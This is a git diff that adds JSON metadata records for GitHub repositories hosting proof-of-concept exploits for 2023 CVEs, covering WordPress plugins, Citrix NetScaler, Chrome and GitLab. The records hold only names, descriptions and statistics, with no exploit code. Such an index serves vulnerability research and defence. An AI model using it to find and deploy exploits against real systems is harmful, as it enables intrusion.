diff --git a/2023/CVE-2023-6289.json b/2023/CVE-2023-6289.json
new file mode 100644
index 0000000000..67ab2b328a
--- /dev/null
+++ b/2023/CVE-2023-6289.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 724794135,
+ "name": "CVE-2023-6289",
+ "full_name": "RandomRobbieBF\/CVE-2023-6289",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-6289",
+ "description": "Swift Performance Lite <= 2.3.6.14 - Missing Authorization to Unauthenticated Settings Export",
+ "fork": false,
+ "created_at": "2023-11-28T20:05:43Z",
+ "updated_at": "2023-11-28T20:05:44Z",
+ "pushed_at": "2023-11-28T20:07:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6319.json b/2023/CVE-2023-6319.json
new file mode 100644
index 0000000000..0a8ae22755
--- /dev/null
+++ b/2023/CVE-2023-6319.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 785372711,
+ "name": "root-my-webos-tv",
+ "full_name": "illixion\/root-my-webos-tv",
+ "owner": {
+ "login": "illixion",
+ "id": 14954655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14954655?v=4",
+ "html_url": "https:\/\/github.com\/illixion"
+ },
+ "html_url": "https:\/\/github.com\/illixion\/root-my-webos-tv",
+ "description": "CVE-2023-6319 proof of concept",
+ "fork": false,
+ "created_at": "2024-04-11T18:58:17Z",
+ "updated_at": "2024-06-04T04:27:41Z",
+ "pushed_at": "2024-04-20T07:37:22Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6538.json b/2023/CVE-2023-6538.json
new file mode 100644
index 0000000000..7213a0e893
--- /dev/null
+++ b/2023/CVE-2023-6538.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 732973718,
+ "name": "CVE-2023-6538",
+ "full_name": "Arszilla\/CVE-2023-6538",
+ "owner": {
+ "login": "Arszilla",
+ "id": 22989170,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22989170?v=4",
+ "html_url": "https:\/\/github.com\/Arszilla"
+ },
+ "html_url": "https:\/\/github.com\/Arszilla\/CVE-2023-6538",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-18T09:29:42Z",
+ "updated_at": "2023-12-18T09:29:48Z",
+ "pushed_at": "2023-12-18T09:29:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6548.json b/2023/CVE-2023-6548.json
new file mode 100644
index 0000000000..17afd129a2
--- /dev/null
+++ b/2023/CVE-2023-6548.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 766855313,
+ "name": "CVE-2023-6548-POC",
+ "full_name": "Roonye660\/CVE-2023-6548-POC",
+ "owner": {
+ "login": "Roonye660",
+ "id": 162106909,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162106909?v=4",
+ "html_url": "https:\/\/github.com\/Roonye660"
+ },
+ "html_url": "https:\/\/github.com\/Roonye660\/CVE-2023-6548-POC",
+ "description": "0day for Citrix Netscaler ADC and NetScaler Gateway latest versions",
+ "fork": false,
+ "created_at": "2024-03-04T08:57:27Z",
+ "updated_at": "2024-05-02T10:58:27Z",
+ "pushed_at": "2024-03-04T09:36:29Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6553.json b/2023/CVE-2023-6553.json
new file mode 100644
index 0000000000..52a9189b9e
--- /dev/null
+++ b/2023/CVE-2023-6553.json
@@ -0,0 +1,106 @@
+[
+ {
+ "id": 731322134,
+ "name": "CVE-2023-6553",
+ "full_name": "Chocapikk\/CVE-2023-6553",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-6553",
+ "description": "Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution",
+ "fork": false,
+ "created_at": "2023-12-13T20:26:59Z",
+ "updated_at": "2024-06-17T10:55:48Z",
+ "pushed_at": "2024-02-06T23:22:31Z",
+ "stargazers_count": 67,
+ "watchers_count": 67,
+ "has_discussions": false,
+ "forks_count": 23,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2023-6553",
+ "cybersecurity",
+ "exploit",
+ "hacking",
+ "infosec",
+ "php",
+ "python",
+ "rce",
+ "security",
+ "security-research",
+ "vulnerability",
+ "wordpress"
+ ],
+ "visibility": "public",
+ "forks": 23,
+ "watchers": 67,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 736295988,
+ "name": "CVE-2023-6553-PoC",
+ "full_name": "motikan2010\/CVE-2023-6553-PoC",
+ "owner": {
+ "login": "motikan2010",
+ "id": 3177297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4",
+ "html_url": "https:\/\/github.com\/motikan2010"
+ },
+ "html_url": "https:\/\/github.com\/motikan2010\/CVE-2023-6553-PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-27T14:14:51Z",
+ "updated_at": "2023-12-27T14:15:37Z",
+ "pushed_at": "2023-12-27T14:16:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 737831693,
+ "name": "CVE-2023-6553",
+ "full_name": "kiddenta\/CVE-2023-6553",
+ "owner": {
+ "login": "kiddenta",
+ "id": 128315553,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128315553?v=4",
+ "html_url": "https:\/\/github.com\/kiddenta"
+ },
+ "html_url": "https:\/\/github.com\/kiddenta\/CVE-2023-6553",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-01T16:57:17Z",
+ "updated_at": "2024-05-11T07:09:14Z",
+ "pushed_at": "2024-05-11T07:09:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6567.json b/2023/CVE-2023-6567.json
new file mode 100644
index 0000000000..cef8736d8c
--- /dev/null
+++ b/2023/CVE-2023-6567.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 741790431,
+ "name": "CVE-2023-6567-poc",
+ "full_name": "mimiloveexe\/CVE-2023-6567-poc",
+ "owner": {
+ "login": "mimiloveexe",
+ "id": 65785929,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65785929?v=4",
+ "html_url": "https:\/\/github.com\/mimiloveexe"
+ },
+ "html_url": "https:\/\/github.com\/mimiloveexe\/CVE-2023-6567-poc",
+ "description": "Time-based SQLi",
+ "fork": false,
+ "created_at": "2024-01-11T05:43:31Z",
+ "updated_at": "2024-01-11T05:43:31Z",
+ "pushed_at": "2024-01-11T05:48:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6595.json b/2023/CVE-2023-6595.json
new file mode 100644
index 0000000000..1a3b3bd754
--- /dev/null
+++ b/2023/CVE-2023-6595.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 766048857,
+ "name": "CVE-2023-6595",
+ "full_name": "sharmashreejaa\/CVE-2023-6595",
+ "owner": {
+ "login": "sharmashreejaa",
+ "id": 161574704,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161574704?v=4",
+ "html_url": "https:\/\/github.com\/sharmashreejaa"
+ },
+ "html_url": "https:\/\/github.com\/sharmashreejaa\/CVE-2023-6595",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-02T07:35:29Z",
+ "updated_at": "2024-03-02T07:35:29Z",
+ "pushed_at": "2024-03-02T07:35:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6634.json b/2023/CVE-2023-6634.json
new file mode 100644
index 0000000000..f8b64db6d7
--- /dev/null
+++ b/2023/CVE-2023-6634.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 782645537,
+ "name": "CVE-2023-6634",
+ "full_name": "krn966\/CVE-2023-6634",
+ "owner": {
+ "login": "krn966",
+ "id": 124454175,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124454175?v=4",
+ "html_url": "https:\/\/github.com\/krn966"
+ },
+ "html_url": "https:\/\/github.com\/krn966\/CVE-2023-6634",
+ "description": "CVE-2023-6634",
+ "fork": false,
+ "created_at": "2024-04-05T18:07:08Z",
+ "updated_at": "2024-04-13T17:29:34Z",
+ "pushed_at": "2024-04-05T19:37:03Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6654.json b/2023/CVE-2023-6654.json
new file mode 100644
index 0000000000..dd39e10f61
--- /dev/null
+++ b/2023/CVE-2023-6654.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 763947006,
+ "name": "CVE-2023-6654",
+ "full_name": "qfmy1024\/CVE-2023-6654",
+ "owner": {
+ "login": "qfmy1024",
+ "id": 76994810,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76994810?v=4",
+ "html_url": "https:\/\/github.com\/qfmy1024"
+ },
+ "html_url": "https:\/\/github.com\/qfmy1024\/CVE-2023-6654",
+ "description": "CVE-2023-6654 EXP",
+ "fork": false,
+ "created_at": "2024-02-27T07:50:01Z",
+ "updated_at": "2024-02-27T08:38:49Z",
+ "pushed_at": "2024-02-27T07:58:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6661.json b/2023/CVE-2023-6661.json
new file mode 100644
index 0000000000..82d371ec3b
--- /dev/null
+++ b/2023/CVE-2023-6661.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 735021939,
+ "name": "CVE-2023-6661",
+ "full_name": "cli-ish\/CVE-2023-6661",
+ "owner": {
+ "login": "cli-ish",
+ "id": 22986332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4",
+ "html_url": "https:\/\/github.com\/cli-ish"
+ },
+ "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-6661",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-23T11:39:50Z",
+ "updated_at": "2023-12-23T11:39:51Z",
+ "pushed_at": "2023-12-23T11:39:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6663.json b/2023/CVE-2023-6663.json
new file mode 100644
index 0000000000..a1918c0a3d
--- /dev/null
+++ b/2023/CVE-2023-6663.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 735021962,
+ "name": "CVE-2023-6663",
+ "full_name": "cli-ish\/CVE-2023-6663",
+ "owner": {
+ "login": "cli-ish",
+ "id": 22986332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4",
+ "html_url": "https:\/\/github.com\/cli-ish"
+ },
+ "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-6663",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-23T11:39:57Z",
+ "updated_at": "2023-12-23T11:39:58Z",
+ "pushed_at": "2023-12-23T11:39:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6700.json b/2023/CVE-2023-6700.json
new file mode 100644
index 0000000000..46e7448dd0
--- /dev/null
+++ b/2023/CVE-2023-6700.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 750276548,
+ "name": "CVE-2023-6700",
+ "full_name": "RandomRobbieBF\/CVE-2023-6700",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-6700",
+ "description": "Cookie Information | Free GDPR Consent Solution <= 2.0.22 - Authenticated (Subscriber+) Arbitrary Options Update",
+ "fork": false,
+ "created_at": "2024-01-30T10:32:54Z",
+ "updated_at": "2024-05-21T13:58:41Z",
+ "pushed_at": "2024-05-21T13:58:37Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6702.json b/2023/CVE-2023-6702.json
new file mode 100644
index 0000000000..6927279fd1
--- /dev/null
+++ b/2023/CVE-2023-6702.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 809375652,
+ "name": "CVE-2023-6702",
+ "full_name": "kaist-hacking\/CVE-2023-6702",
+ "owner": {
+ "login": "kaist-hacking",
+ "id": 74822163,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74822163?v=4",
+ "html_url": "https:\/\/github.com\/kaist-hacking"
+ },
+ "html_url": "https:\/\/github.com\/kaist-hacking\/CVE-2023-6702",
+ "description": "Chrome Renderer 1day RCE via Type Confusion in Async Stack Trace (v8ctf submission)",
+ "fork": false,
+ "created_at": "2024-06-02T14:15:27Z",
+ "updated_at": "2024-06-25T11:39:41Z",
+ "pushed_at": "2024-06-03T05:03:46Z",
+ "stargazers_count": 60,
+ "watchers_count": 60,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 60,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6710.json b/2023/CVE-2023-6710.json
new file mode 100644
index 0000000000..95feed8606
--- /dev/null
+++ b/2023/CVE-2023-6710.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 735541566,
+ "name": "Metasploit-Exploits-CVE-2023-6710",
+ "full_name": "DedSec-47\/Metasploit-Exploits-CVE-2023-6710",
+ "owner": {
+ "login": "DedSec-47",
+ "id": 154718593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154718593?v=4",
+ "html_url": "https:\/\/github.com\/DedSec-47"
+ },
+ "html_url": "https:\/\/github.com\/DedSec-47\/Metasploit-Exploits-CVE-2023-6710",
+ "description": "Welcome to the Metasploit Exploits Repository, your go-to resource for a comprehensive collection of cutting-edge exploits designed for penetration testing and ethical hacking. Developed and maintained by Mohamed Mounir Boudjema, this repository is crafted with a deep understanding of the evolving landscape of cybersecurity.",
+ "fork": false,
+ "created_at": "2023-12-25T09:40:31Z",
+ "updated_at": "2024-01-25T21:47:18Z",
+ "pushed_at": "2023-12-28T12:23:22Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 735543895,
+ "name": "CVE-2023-6710",
+ "full_name": "DedSec-47\/CVE-2023-6710",
+ "owner": {
+ "login": "DedSec-47",
+ "id": 154718593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154718593?v=4",
+ "html_url": "https:\/\/github.com\/DedSec-47"
+ },
+ "html_url": "https:\/\/github.com\/DedSec-47\/CVE-2023-6710",
+ "description": "Explore the depths of CVE-2023-6710 with our comprehensive Proof of Concept (PoC). This CVE, identified as a potential security vulnerability, has been meticulously examined to demonstrate its impact and provide a hands-on understanding of the associated risks.",
+ "fork": false,
+ "created_at": "2023-12-25T09:50:23Z",
+ "updated_at": "2024-01-25T21:47:19Z",
+ "pushed_at": "2023-12-28T11:29:42Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6875.json b/2023/CVE-2023-6875.json
new file mode 100644
index 0000000000..5f2021b604
--- /dev/null
+++ b/2023/CVE-2023-6875.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 742857167,
+ "name": "CVE-2023-6875",
+ "full_name": "UlyssesSaicha\/CVE-2023-6875",
+ "owner": {
+ "login": "UlyssesSaicha",
+ "id": 70921512,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70921512?v=4",
+ "html_url": "https:\/\/github.com\/UlyssesSaicha"
+ },
+ "html_url": "https:\/\/github.com\/UlyssesSaicha\/CVE-2023-6875",
+ "description": "CVE-2023-6875 PoC",
+ "fork": false,
+ "created_at": "2024-01-13T15:23:17Z",
+ "updated_at": "2024-05-25T00:12:11Z",
+ "pushed_at": "2024-01-15T10:58:20Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 749076546,
+ "name": "CVE-2023-6875",
+ "full_name": "gbrsh\/CVE-2023-6875",
+ "owner": {
+ "login": "gbrsh",
+ "id": 36970331,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4",
+ "html_url": "https:\/\/github.com\/gbrsh"
+ },
+ "html_url": "https:\/\/github.com\/gbrsh\/CVE-2023-6875",
+ "description": "Exploit for CVE-2023-6875 - Unauthorized Account Takeover. ",
+ "fork": false,
+ "created_at": "2024-01-27T14:20:51Z",
+ "updated_at": "2024-04-18T17:24:50Z",
+ "pushed_at": "2024-01-27T14:23:46Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 753010588,
+ "name": "CVE-2023-6875",
+ "full_name": "hatlesswizard\/CVE-2023-6875",
+ "owner": {
+ "login": "hatlesswizard",
+ "id": 123577653,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123577653?v=4",
+ "html_url": "https:\/\/github.com\/hatlesswizard"
+ },
+ "html_url": "https:\/\/github.com\/hatlesswizard\/CVE-2023-6875",
+ "description": "CVE-2023-6875 exploit written for Xakep.Ru",
+ "fork": false,
+ "created_at": "2024-02-05T09:44:35Z",
+ "updated_at": "2024-02-05T09:45:06Z",
+ "pushed_at": "2024-02-05T10:14:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6895.json b/2023/CVE-2023-6895.json
new file mode 100644
index 0000000000..173b0c53e0
--- /dev/null
+++ b/2023/CVE-2023-6895.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 744508630,
+ "name": "CVE-2023-6895",
+ "full_name": "FuBoLuSec\/CVE-2023-6895",
+ "owner": {
+ "login": "FuBoLuSec",
+ "id": 156916644,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156916644?v=4",
+ "html_url": "https:\/\/github.com\/FuBoLuSec"
+ },
+ "html_url": "https:\/\/github.com\/FuBoLuSec\/CVE-2023-6895",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-17T12:53:47Z",
+ "updated_at": "2024-02-21T02:49:31Z",
+ "pushed_at": "2024-01-21T07:39:36Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 754039197,
+ "name": "CVE-2023-6895",
+ "full_name": "nles-crt\/CVE-2023-6895",
+ "owner": {
+ "login": "nles-crt",
+ "id": 61862786,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61862786?v=4",
+ "html_url": "https:\/\/github.com\/nles-crt"
+ },
+ "html_url": "https:\/\/github.com\/nles-crt\/CVE-2023-6895",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-07T09:28:10Z",
+ "updated_at": "2024-02-17T05:16:07Z",
+ "pushed_at": "2024-02-07T09:32:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6933.json b/2023/CVE-2023-6933.json
new file mode 100644
index 0000000000..b1f71a3cb3
--- /dev/null
+++ b/2023/CVE-2023-6933.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 749563403,
+ "name": "CVE-2023-6933",
+ "full_name": "w2xim3\/CVE-2023-6933",
+ "owner": {
+ "login": "w2xim3",
+ "id": 91914344,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91914344?v=4",
+ "html_url": "https:\/\/github.com\/w2xim3"
+ },
+ "html_url": "https:\/\/github.com\/w2xim3\/CVE-2023-6933",
+ "description": "Introduction to CVE-2023-6933 Vulnerability",
+ "fork": false,
+ "created_at": "2024-01-28T23:16:53Z",
+ "updated_at": "2024-01-29T02:26:33Z",
+ "pushed_at": "2024-01-29T02:34:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-6985.json b/2023/CVE-2023-6985.json
new file mode 100644
index 0000000000..a4d2cceb33
--- /dev/null
+++ b/2023/CVE-2023-6985.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 749919472,
+ "name": "CVE-2023-6985",
+ "full_name": "RandomRobbieBF\/CVE-2023-6985",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-6985",
+ "description": "10Web AI Assistant – AI content writing assistant <= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation\/Activation Description",
+ "fork": false,
+ "created_at": "2024-01-29T16:51:53Z",
+ "updated_at": "2024-01-29T16:55:00Z",
+ "pushed_at": "2024-01-29T16:54:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "ai-assistant-by-10web",
+ "cve-2023-6985",
+ "wordpress"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-7016.json b/2023/CVE-2023-7016.json
new file mode 100644
index 0000000000..08bf5244e8
--- /dev/null
+++ b/2023/CVE-2023-7016.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 764138202,
+ "name": "CVE-2023-7016-POC",
+ "full_name": "ewilded\/CVE-2023-7016-POC",
+ "owner": {
+ "login": "ewilded",
+ "id": 1158719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1158719?v=4",
+ "html_url": "https:\/\/github.com\/ewilded"
+ },
+ "html_url": "https:\/\/github.com\/ewilded\/CVE-2023-7016-POC",
+ "description": "POC for the flaw in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows that allows an attacker to execute code at a SYSTEM level via local access.",
+ "fork": false,
+ "created_at": "2024-02-27T14:48:19Z",
+ "updated_at": "2024-02-27T14:50:26Z",
+ "pushed_at": "2024-02-27T14:50:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-7028.json b/2023/CVE-2023-7028.json
new file mode 100644
index 0000000000..a616398045
--- /dev/null
+++ b/2023/CVE-2023-7028.json
@@ -0,0 +1,338 @@
+[
+ {
+ "id": 742312591,
+ "name": "CVE-2023-7028",
+ "full_name": "V1lu0\/CVE-2023-7028",
+ "owner": {
+ "login": "V1lu0",
+ "id": 33352530,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33352530?v=4",
+ "html_url": "https:\/\/github.com\/V1lu0"
+ },
+ "html_url": "https:\/\/github.com\/V1lu0\/CVE-2023-7028",
+ "description": "CVE-2023-7028 poc",
+ "fork": false,
+ "created_at": "2024-01-12T07:42:02Z",
+ "updated_at": "2024-05-29T08:10:49Z",
+ "pushed_at": "2024-05-03T06:05:46Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
